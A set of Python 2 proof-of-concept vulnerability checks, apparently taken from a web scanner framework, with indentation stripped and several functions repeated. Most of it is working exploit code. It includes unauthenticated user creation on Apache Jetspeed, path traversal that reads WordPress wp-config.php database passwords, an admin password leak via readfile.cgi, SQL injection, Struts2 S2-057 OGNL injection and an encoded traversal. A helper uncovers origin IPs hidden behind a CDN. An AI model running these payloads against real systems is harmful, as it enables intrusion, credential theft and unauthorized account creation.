def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
url = get_domain(url).rstrip('/')
user = randomString(6)
password = randomString(6)
url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
data1 = {
'name': user,
'password': password,
'password_confirm': password,
'user_name_given': 'foo',
'user_name_family': 'bar',
'user_email': '*****@*****.**',
'newrule': ''
}
try:
requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
# response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
if 'PRINCIPAL_ALREADY_EXISTS' in c:
if not ENABLE_EXP:
return True
else:
return False
except Exception, e:
if not ENABLE_EXP:
return False
def poc(url):
target = get_entry(url)
if not target:
return False
if CHECK_WAF and has_waf(target):
return '[Uncertain,WAF detected!] ' + get_domain(target)
data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"
# Content-Type needed
headers = {
'User-Agent': loadfakeuseragent(),
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
r1 = requests.post(target,
headers=headers,
data=data_temp.replace('[P]', '-1 OR 1=1'))
r2 = requests.post(target,
headers=headers,
data=data_temp.replace('[P]', '-1 OR 1=2'))
except:
return False
if r1.status_code == r2.status_code == 200 and len(r1.content) != len(
r2.content):
return True
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = '/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php'
target = get_domain(url).rstrip('/') + payload
try:
r = urllib2.urlopen(target, timeout=5).read() # cannot use requests here
if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
return target
except Exception, e:
pass
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = '/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php'
target = get_domain(url).rstrip('/') + payload
try:
r = urllib2.urlopen(target, data="_mysite_download_skin=../../../../../wp-config.php", timeout=5).read()
if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
return target
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "/cgi-bin/readfile.cgi?query=ADMINID"
target_url = get_domain(url) + payload
try:
r = requests.get(target_url, timeout=10)
if 'var Adm_Pass1' in r.content:
return target_url
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
url = get_domain(url)
payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
try:
c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
except Exception:
return False
if 'Version' in c:
return True
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
payload = "/cgi-bin/readfile.cgi?query=ADMINID"
target_url = get_domain(url) + payload
try:
r = requests.get(target_url, timeout=10)
if 'var Adm_Pass1' in r.content:
return target_url
except Exception:
pass
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
url = get_domain(url)
payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
try:
c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
except Exception:
return False
if 'Version' in c:
return True
return False
def poc(url, **kwargs):
if kwargs.get('ip'):
url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
else:
url = url
timeout = 10
domain = get_domain(url)
proxies = {'http': '127.0.0.1:9999'}
headers = {
"User-Agent":
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
}
ran_a = random.randint(10000000, 20000000)
ran_b = random.randint(1000000, 2000000)
ran_check = ran_a - ran_b
parser = urlparse(url)
if parser.path:
_path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
else:
_path_list = 'index.action'
url_list = iterate_path(url)
for urls in url_list:
url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
try:
res = requests.get(
url,
timeout=timeout,
headers=headers,
allow_redirects=False,
verify=False,
)
if res.status_code == 302 and res.headers.get(
'Location') is not None and str(
ran_check) in res.headers.get('Location'):
urlLoca = res.headers.get('Location')
res2 = requests.get(domain + urlLoca,
headers=headers,
timeout=6,
allow_redirects=False,
verify=False)
if str(ran_check) in res2.text:
result = "目标存在 Struts2-057, check url: %s" % url
return result
except:
pass
def checkCDN(url):
"""
Detect if the website is using CDN or cloud-based web application firewall
:param url: Target URL or Domain
:return True / False
"""
url = 'http://' + url if '://' not in url else url
url = get_domain(url)
dest = 'http://ce.cloud.360.cn/'
s = requests.session()
data1 = _get_static_post_attr(s.get(dest).content)
data1['domain'] = url
s.post('http://ce.cloud.360.cn/task', data=data1)
headers = {
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
s.post('http://ce.cloud.360.cn/Tasks/detect', data=data1, headers=headers)
time.sleep(5) # 5 sec delay for nodes to detect
data = 'domain=' + url + '&type=get&ids%5B%5D=1&ids%5B%5D=2&ids%5B%5D=3&ids%5B%5D=4&ids%5B%5D=5&ids%5B%5D=6&ids%5B%5D=7&ids%5B%5D=8&ids%5B%5D=9&ids%5B%5D=16&ids%5B%5D=18&ids%5B%5D=22&ids%5B%5D=23&ids%5B%5D=41&ids%5B%5D=45&ids%5B%5D=46&ids%5B%5D=47&ids%5B%5D=49&ids%5B%5D=50&ids%5B%5D=54&ids%5B%5D=57&ids%5B%5D=58&ids%5B%5D=61&ids%5B%5D=62&ids%5B%5D=64&ids%5B%5D=71&ids%5B%5D=78&ids%5B%5D=79&ids%5B%5D=80&ids%5B%5D=93&ids%5B%5D=99&ids%5B%5D=100&ids%5B%5D=101&ids%5B%5D=103&ids%5B%5D=104&ids%5B%5D=106&ids%5B%5D=110&ids%5B%5D=112&ids%5B%5D=114&ids%5B%5D=116&ids%5B%5D=117&ids%5B%5D=118&ids%5B%5D=119&ids%5B%5D=120&ids%5B%5D=121&ids%5B%5D=122&user_ip_list='
r = s.post('http://ce.cloud.360.cn/GetData/getTaskDatas',
data=data,
headers=headers)
ips = re.findall('"ip":"(.*?)"', r.content)
ans = list(set(ips))
msg = url
if not len(ips):
msg += ' [Target Unknown]'
return msg
msg += ' [CDN Found!]' if len(ans) > 1 else ''
msg += ' Nodes:' + str(len(ips))
msg += ' IP(%s):' % str(len(ans)) + ' '.join(ans)
return msg
def poc(url):
if '://' not in url:
if ':443' in url:
url = 'https://' + url
else:
url = 'http://' + url
url = get_domain(url).rstrip('/')
user = randomString(6)
password = randomString(6)
url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
data1 = {
'name': user,
'password': password,
'password_confirm': password,
'user_name_given': 'foo',
'user_name_family': 'bar',
'user_email': '*****@*****.**',
'newrule': ''
}
try:
requests.post(url1,
data=data1,
headers={'User-Agent': firefox},
timeout=10,
verify=False)
c = requests.post(url1,
data=data1,
headers={
'User-Agent': firefox
},
timeout=10,
verify=False).content
# response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
if 'PRINCIPAL_ALREADY_EXISTS' in c:
if not ENABLE_EXP:
return True
else:
return False
except Exception, e:
if not ENABLE_EXP:
return False
